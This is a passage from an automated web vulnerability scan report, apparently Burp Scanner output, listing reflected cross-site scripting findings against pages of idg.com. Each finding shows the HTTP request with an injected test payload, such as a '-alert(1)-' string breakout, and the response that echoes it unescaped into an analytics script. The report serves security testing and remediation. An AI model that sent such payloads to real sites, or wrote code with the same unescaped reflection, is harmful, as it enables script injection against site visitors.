var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idc359bd";c32d7581091");
} catch(err) {}</script>
...[SNIP]...

2.145. http://idg.com/www/HomeNew.nsf/docs/idc [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ae8e"-alert(1)-"283f308e868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idc?2ae8e"-alert(1)-"283f308e868=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idc?2ae8e"-alert(1)-"283f308e868=1");
} catch(err) {}</script>
...[SNIP]...

2.146. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed326"%3b904e4d03b9 was submitted in the REST URL parameter 1. This input was echoed as ed326";904e4d03b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwed326"%3b904e4d03b9/HomeNew.nsf/docs/idg_executives HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5022
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwed326";904e4d03b9/HomeNew.nsf/docs/idg_executives");
} catch(err) {}</script>
...[SNIP]...

2.147. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d561"%3b6455cc6564d was submitted in the REST URL parameter 3. This input was echoed as 3d561";6455cc6564d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs3d561"%3b6455cc6564d/idg_executives HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs3d561";6455cc6564d/idg_executives");
} catch(err) {}</script>
...[SNIP]...

2.148. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e552"%3b216bed3b756 was submitted in the REST URL parameter 4. This input was echoed as 3e552";216bed3b756 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_executives3e552"%3b216bed3b756 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_executives3e552";216bed3b756");
} catch(err) {}</script>
...[SNIP]...

2.149. http://idg.com/www/HomeNew.nsf/docs/idg_executives [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2af"-alert(1)-"0a5722af41d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_executives?1e2af"-alert(1)-"0a5722af41d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_executives?1e2af"-alert(1)-"0a5722af41d=1");
} catch(err) {}</script>
...[SNIP]...

2.150. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e22a"%3bd456b889b9 was submitted in the REST URL parameter 1. This input was echoed as 8e22a";d456b889b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www8e22a"%3bd456b889b9/HomeNew.nsf/docs/idg_privacy_policy HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www8e22a";d456b889b9/HomeNew.nsf/docs/idg_privacy_policy");
} catch(err) {}</script>
...[SNIP]...

2.151. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff749"%3be32ec39d933 was submitted in the REST URL parameter 3. This input was echoed as ff749";e32ec39d933 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsff749"%3be32ec39d933/idg_privacy_policy HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsff749";e32ec39d933/idg_privacy_policy");
} catch(err) {}</script>
...[SNIP]...

2.152. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d638"%3bc7eb102dcb6 was submitted in the REST URL parameter 4. This input was echoed as 9d638";c7eb102dcb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_privacy_policy9d638"%3bc7eb102dcb6 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_privacy_policy9d638";c7eb102dcb6");
} catch(err) {}</script>
...[SNIP]...

2.153. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2605f"-alert(1)-"fae0f9d2f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_privacy_policy?2605f"-alert(1)-"fae0f9d2f09=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_privacy_policy?2605f"-alert(1)-"fae0f9d2f09=1");
} catch(err) {}</script>
...[SNIP]...

2.154. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ba2"%3bf9d8deefc6f was submitted in the REST URL parameter 1. This input was echoed as c2ba2";f9d8deefc6f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwc2ba2"%3bf9d8deefc6f/HomeNew.nsf/docs/intl_media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwc2ba2";f9d8deefc6f/HomeNew.nsf/docs/intl_media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.155. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b835"%3b5a981b27a8 was submitted in the REST URL parameter 3. This input was echoed as 7b835";5a981b27a8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs7b835"%3b5a981b27a8/intl_media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs7b835";5a981b27a8/intl_media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.156. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc268"%3b237152f115b was submitted in the REST URL parameter 4. This input was echoed as bc268";237152f115b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/intl_media_contactsbc268"%3b237152f115b HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/intl_media_contactsbc268";237152f115b");
} catch(err) {}</script>
...[SNIP]...

2.157. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7654"-alert(1)-"8faa41383a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/intl_media_contacts?c7654"-alert(1)-"8faa41383a4=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5041
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/intl_media_contacts?c7654"-alert(1)-"8faa41383a4=1");
} catch(err) {}</script>
...[SNIP]...

2.158. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98663"%3b8f87c12c52b was submitted in the REST URL parameter 1. This input was echoed as 98663";8f87c12c52b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www98663"%3b8f87c12c52b/HomeNew.nsf/docs/licensing HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www98663";8f87c12c52b/HomeNew.nsf/docs/licensing");
} catch(err) {}</script>
...[SNIP]...

2.159. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13870"%3b6ce10bb9cb9 was submitted in the REST URL parameter 3. This input was echoed as 13870";6ce10bb9cb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs13870"%3b6ce10bb9cb9/licensing HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs13870";6ce10bb9cb9/licensing");
} catch(err) {}</script>
...[SNIP]...

2.160. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb7b"%3b0088f227736 was submitted in the REST URL parameter 4. This input was echoed as ceb7b";0088f227736 in the application's response.

